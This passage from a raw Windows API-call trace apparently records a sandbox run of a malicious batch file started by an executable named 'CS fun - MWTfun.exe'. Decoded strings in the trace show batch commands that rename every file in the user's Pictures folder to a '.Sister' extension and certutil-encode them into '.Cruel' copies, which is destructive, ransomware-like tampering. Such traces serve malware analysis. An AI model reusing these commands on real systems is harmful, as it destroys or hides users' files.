0x21ed8c7d0c0 [0292.400] FindClose (in: hFindFile=0x21ed8c7d0c0 | out: hFindFile=0x21ed8c7d0c0) returned 1 [0292.400] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdd10 | out: lpFindFileData=0xa6cf4fdd10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cb80 [0292.400] FindClose (in: hFindFile=0x21ed8c7cb80 | out: hFindFile=0x21ed8c7cb80) returned 1 [0292.400] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures", lpFindFileData=0xa6cf4fdd10 | out: lpFindFileData=0xa6cf4fdd10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe6e655c4, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe6e655c4, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 0x21ed8c7cac0 [0292.400] FindClose (in: hFindFile=0x21ed8c7cac0 | out: hFindFile=0x21ed8c7cac0) returned 1 [0292.401] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0292.401] SetCurrentDirectoryW (lpPathName="C:\\Users\\FD1HVy\\Pictures" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 1 [0292.402] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\FD1HVy\\Pictures") returned 1 [0292.402] GetProcessHeap () returned 0x21ed8c70000 [0292.402] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6dc60) returned 1 [0292.402] GetEnvironmentStringsW () returned 0x21ed8d69e80* [0292.402] GetProcessHeap () returned 0x21ed8c70000 [0292.402] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8d6d110 [0292.402] FreeEnvironmentStringsA (penv="=") returned 1 [0292.402] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0292.402] GetProcessHeap () returned 0x21ed8c70000 [0292.402] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7bee0) returned 1 [0292.402] ??_V@YAXPEAX@Z () returned 0x1 [0292.402] ??_V@YAXPEAX@Z () returned 0x1 [0292.402] ??_V@YAXPEAX@Z () returned 0x1 [0292.402] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.402] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x7) returned 1 [0292.403] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.403] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x7ff66c5cfc08 | out: lpMode=0x7ff66c5cfc08) returned 1 [0292.404] _get_osfhandle (_FileHandle=0) returned 0x4c [0292.404] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x7ff66c5cfc0c | out: lpMode=0x7ff66c5cfc0c) returned 1 [0292.404] SetConsoleInputExeNameW () returned 0x1 [0292.404] GetConsoleOutputCP () returned 0x1b5 [0292.405] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff66c5cfbb0 | out: lpCPInfo=0x7ff66c5cfbb0) returned 1 [0292.405] SetThreadUILanguage (LangId=0x0) returned 0x409 [0292.405] ??_V@YAXPEAX@Z () returned 0x1 [0292.405] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp\\aca2.tmp\\aca3.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xa6cf4fe9b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98 [0292.405] _open_osfhandle (_OSFileHandle=0x98, _Flags=8) returned 3 [0292.405] _get_osfhandle (_FileHandle=3) returned 0x98 [0292.405] SetFilePointer (in: hFile=0x98, lDistanceToMove=607, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x25f [0292.405] GetProcessHeap () returned 0x21ed8c70000 [0292.406] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7bdf0) returned 1 [0292.406] GetProcessHeap () returned 0x21ed8c70000 [0292.406] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7cf40) returned 1 [0292.406] GetProcessHeap () returned 0x21ed8c70000 [0292.406] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7bcb0) returned 1 [0292.406] GetProcessHeap () returned 0x21ed8c70000 [0292.406] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7ba80) returned 1 [0292.406] GetProcessHeap () returned 0x21ed8c70000 [0292.406] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95ba0) returned 1 [0292.406] GetProcessHeap () returned 0x21ed8c70000 [0292.406] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c96100) returned 1 [0292.406] _get_osfhandle (_FileHandle=3) returned 0x98 [0292.406] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25f [0292.406] ReadFile (in: hFile=0x98, lpBuffer=0x7ff66c5c9970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xa6cf4fe970, lpOverlapped=0x0 | out: lpBuffer=0x7ff66c5c9970*, lpNumberOfBytesRead=0xa6cf4fe970*=0x29e, lpOverlapped=0x0) returned 1 [0292.406] SetFilePointer (in: hFile=0x98, lDistanceToMove=609, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x261 [0292.407] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff66c5c9970, cbMultiByte=2, lpWideCharStr=0x7ff66c5d3c30, cchWideChar=8191 | out: lpWideCharStr="\r\n %UserProFile%\\Pictures\\\r\ntutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n \"%%~a.Sister\" \"%%~na.bat\"\r\n") returned 2 [0292.407] _get_osfhandle (_FileHandle=3) returned 0x98 [0292.407] GetFileType (hFile=0x98) returned 0x1 [0292.407] _get_osfhandle (_FileHandle=3) returned 0x98 [0292.407] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x261 [0292.407] GetProcessHeap () returned 0x21ed8c70000 [0292.407] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9379db0 [0292.408] GetProcessHeap () returned 0x21ed8c70000 [0292.408] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9379db0) returned 1 [0292.408] _tell (_FileHandle=3) returned 609 [0292.408] _close (_FileHandle=3) returned 0 [0292.408] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp\\aca2.tmp\\aca3.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xa6cf4fe9b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98 [0292.408] _open_osfhandle (_OSFileHandle=0x98, _Flags=8) returned 3 [0292.408] _get_osfhandle (_FileHandle=3) returned 0x98 [0292.409] SetFilePointer (in: hFile=0x98, lDistanceToMove=609, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x261 [0292.409] _get_osfhandle (_FileHandle=3) returned 0x98 [0292.409] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x261 [0292.409] ReadFile (in: hFile=0x98, lpBuffer=0x7ff66c5c9970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xa6cf4fe970, lpOverlapped=0x0 | out: lpBuffer=0x7ff66c5c9970*, lpNumberOfBytesRead=0xa6cf4fe970*=0x29c, lpOverlapped=0x0) returned 1 [0292.409] SetFilePointer (in: hFile=0x98, lDistanceToMove=701, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2bd [0292.409] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff66c5c9970, cbMultiByte=92, lpWideCharStr=0x7ff66c5d3c30, cchWideChar=8191 | out: lpWideCharStr="for %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n") returned 92 [0292.409] _get_osfhandle (_FileHandle=3) returned 0x98 [0292.409] GetFileType (hFile=0x98) returned 0x1 [0292.409] _get_osfhandle (_FileHandle=3) returned 0x98 [0292.409] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2bd [0292.409] GetProcessHeap () returned 0x21ed8c70000 [0292.409] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9379db0 [0292.409] GetProcessHeap () returned 0x21ed8c70000 [0292.410] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9379db0) returned 1 [0292.410] _wcsicmp (_String1="for", _String2=")") returned 61 [0292.410] _wcsicmp (_String1="FOR", _String2="for") returned 0 [0292.410] _wcsicmp (_String1="FOR/?", _String2="for") returned 47 [0292.410] GetProcessHeap () returned 0x21ed8c70000 [0292.410] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c964c0 [0292.410] GetProcessHeap () returned 0x21ed8c70000 [0292.410] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4c) returned 0x21ed8c7cd60 [0292.410] GetProcessHeap () returned 0x21ed8c70000 [0292.410] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1c) returned 0x21ed8d45dd0 [0292.410] GetProcessHeap () returned 0x21ed8c70000 [0292.410] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45dd0, Size=0x18) returned 0x21ed8c95800 [0292.410] GetProcessHeap () returned 0x21ed8c70000 [0292.410] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95800) returned 0x18 [0292.410] _wcsicmp (_String1="/L", _String2="%a") returned 10 [0292.410] _wcsicmp (_String1="/D", _String2="%a") returned 10 [0292.410] _wcsicmp (_String1="/F", _String2="%a") returned 10 [0292.410] _wcsicmp (_String1="/R", _String2="%a") returned 10 [0292.410] _wcsicmp (_String1="IN", _String2="in") returned 0 [0292.410] GetProcessHeap () returned 0x21ed8c70000 [0292.410] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x14) returned 0x21ed8c95920 [0292.411] _wcsicmp (_String1="DO", _String2="do") returned 0 [0292.411] _wcsicmp (_String1="ren", _String2=")") returned 73 [0292.411] _wcsicmp (_String1="FOR", _String2="ren") returned -12 [0292.411] _wcsicmp (_String1="FOR/?", _String2="ren") returned -12 [0292.411] _wcsicmp (_String1="IF", _String2="ren") returned -9 [0292.411] _wcsicmp (_String1="IF/?", _String2="ren") returned -9 [0292.411] _wcsicmp (_String1="REM", _String2="ren") returned -1 [0292.411] _wcsicmp (_String1="REM/?", _String2="ren") returned -1 [0292.411] GetProcessHeap () returned 0x21ed8c70000 [0292.411] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c96640 [0292.411] GetProcessHeap () returned 0x21ed8c70000 [0292.411] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x18) returned 0x21ed8c95780 [0292.411] GetProcessHeap () returned 0x21ed8c70000 [0292.411] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36) returned 0x21ed8cc8850 [0292.411] GetProcessHeap () returned 0x21ed8c70000 [0292.411] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c96880 [0292.411] _wcsicmp (_String1="for", _String2=")") returned 61 [0292.411] _wcsicmp (_String1="FOR", _String2="for") returned 0 [0292.411] _wcsicmp (_String1="FOR/?", _String2="for") returned 47 [0292.411] GetProcessHeap () returned 0x21ed8c70000 [0292.411] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c96280 [0292.411] GetProcessHeap () returned 0x21ed8c70000 [0292.412] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4c) returned 0x21ed8c7ca60 [0292.412] GetProcessHeap () returned 0x21ed8c70000 [0292.412] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1c) returned 0x21ed8d45b30 [0292.412] GetProcessHeap () returned 0x21ed8c70000 [0292.412] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45b30, Size=0x18) returned 0x21ed8c95ae0 [0292.412] GetProcessHeap () returned 0x21ed8c70000 [0292.412] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95ae0) returned 0x18 [0292.412] _wcsicmp (_String1="/L", _String2="%a") returned 10 [0292.412] _wcsicmp (_String1="/D", _String2="%a") returned 10 [0292.412] _wcsicmp (_String1="/F", _String2="%a") returned 10 [0292.412] _wcsicmp (_String1="/R", _String2="%a") returned 10 [0292.412] _wcsicmp (_String1="IN", _String2="in") returned 0 [0292.412] GetProcessHeap () returned 0x21ed8c70000 [0292.412] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c96b80 [0292.412] _wcsicmp (_String1="DO", _String2="do") returned 0 [0292.412] _wcsicmp (_String1="ren", _String2=")") returned 73 [0292.412] _wcsicmp (_String1="FOR", _String2="ren") returned -12 [0292.412] _wcsicmp (_String1="FOR/?", _String2="ren") returned -12 [0292.412] _wcsicmp (_String1="IF", _String2="ren") returned -9 [0292.412] _wcsicmp (_String1="IF/?", _String2="ren") returned -9 [0292.412] _wcsicmp (_String1="REM", _String2="ren") returned -1 [0292.413] _wcsicmp (_String1="REM/?", _String2="ren") returned -1 [0292.413] GetProcessHeap () returned 0x21ed8c70000 [0292.413] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c96940 [0292.413] GetProcessHeap () returned 0x21ed8c70000 [0292.413] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x18) returned 0x21ed8c95480 [0292.413] GetProcessHeap () returned 0x21ed8c70000 [0292.413] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x42) returned 0x21ed8c7ba30 [0292.413] _tell (_FileHandle=3) returned 701 [0292.413] _close (_FileHandle=3) returned 0 [0292.413] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe748 | out: _Buffer="\r\n") returned 2 [0292.413] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.413] GetFileType (hFile=0x50) returned 0x2 [0292.413] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.413] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe6d8 | out: lpMode=0xa6cf4fe6d8) returned 1 [0292.414] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.414] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe718, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe718*=0x2) returned 1 [0292.421] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0292.421] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0292.421] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe758 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0292.421] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fe758 | out: _Buffer=">") returned 1 [0292.421] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.421] GetFileType (hFile=0x50) returned 0x2 [0292.421] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.421] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe708 | out: lpMode=0xa6cf4fe708) returned 1 [0292.422] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.422] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fe748, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe748*=0x19) returned 1 [0292.422] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fea18 | out: _Buffer="for") returned 3 [0292.422] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.422] GetFileType (hFile=0x50) returned 0x2 [0292.422] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.422] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0292.423] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.423] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0x3) returned 1 [0292.423] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fea18 | out: _Buffer=" %a in ") returned 7 [0292.423] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.424] GetFileType (hFile=0x50) returned 0x2 [0292.424] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.424] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0292.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.424] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0x7) returned 1 [0292.425] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fea18 | out: _Buffer="(*) do ") returned 7 [0292.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.425] GetFileType (hFile=0x50) returned 0x2 [0292.425] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.425] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0292.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.426] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0x7) returned 1 [0292.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.427] GetFileType (hFile=0x50) returned 0x2 [0292.427] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.427] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe978 | out: lpMode=0xa6cf4fe978) returned 1 [0292.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.427] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8c95790*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe9b8, lpReserved=0x0 | out: lpBuffer=0x21ed8c95790*, lpNumberOfCharsWritten=0xa6cf4fe9b8*=0x3) returned 1 [0292.428] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe9b8 | out: _Buffer=" \"%a\" \"%~a.Sister\" ") returned 19 [0292.429] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.429] GetFileType (hFile=0x50) returned 0x2 [0292.429] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.429] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe948 | out: lpMode=0xa6cf4fe948) returned 1 [0292.429] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.429] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x13, lpNumberOfCharsWritten=0xa6cf4fe988, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe988*=0x13) returned 1 [0292.430] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe9e8 | out: _Buffer=" & ") returned 3 [0292.430] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.430] GetFileType (hFile=0x50) returned 0x2 [0292.430] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.430] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe978 | out: lpMode=0xa6cf4fe978) returned 1 [0292.430] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.430] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe9b8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9b8*=0x3) returned 1 [0292.431] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe9b8 | out: _Buffer="for") returned 3 [0292.431] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.431] GetFileType (hFile=0x50) returned 0x2 [0292.431] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.431] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe948 | out: lpMode=0xa6cf4fe948) returned 1 [0292.432] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.432] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe988, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe988*=0x3) returned 1 [0292.432] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe9b8 | out: _Buffer=" %a in ") returned 7 [0292.432] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.432] GetFileType (hFile=0x50) returned 0x2 [0292.432] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.432] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe948 | out: lpMode=0xa6cf4fe948) returned 1 [0292.433] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.433] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe988, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe988*=0x7) returned 1 [0292.433] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe9b8 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0292.433] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.433] GetFileType (hFile=0x50) returned 0x2 [0292.433] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.433] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe948 | out: lpMode=0xa6cf4fe948) returned 1 [0292.434] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.434] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe988, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe988*=0x55) returned 1 [0292.441] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.441] GetFileType (hFile=0x50) returned 0x2 [0292.441] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.441] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe978 | out: lpMode=0xa6cf4fe978) returned 1 [0292.441] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.441] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8c95490*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe9b8, lpReserved=0x0 | out: lpBuffer=0x21ed8c95490*, lpNumberOfCharsWritten=0xa6cf4fe9b8*=0x3) returned 1 [0292.442] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe9b8 | out: _Buffer=" \"%~a.Sister\" \"%~na.bat\" ") returned 25 [0292.442] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.442] GetFileType (hFile=0x50) returned 0x2 [0292.442] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.442] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe948 | out: lpMode=0xa6cf4fe948) returned 1 [0292.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.443] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fe988, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe988*=0x19) returned 1 [0292.443] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fea48 | out: _Buffer="\r\n") returned 2 [0292.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.443] GetFileType (hFile=0x50) returned 0x2 [0292.443] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.443] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9d8 | out: lpMode=0xa6cf4fe9d8) returned 1 [0292.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.444] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fea18, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fea18*=0x2) returned 1 [0292.448] malloc (_Size=0xffce) returned 0x21ed8e90940 [0292.449] ??_V@YAXPEAX@Z () returned 0x21ed8e90940 [0292.449] GetProcessHeap () returned 0x21ed8c70000 [0292.449] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7ce80 [0292.449] GetProcessHeap () returned 0x21ed8c70000 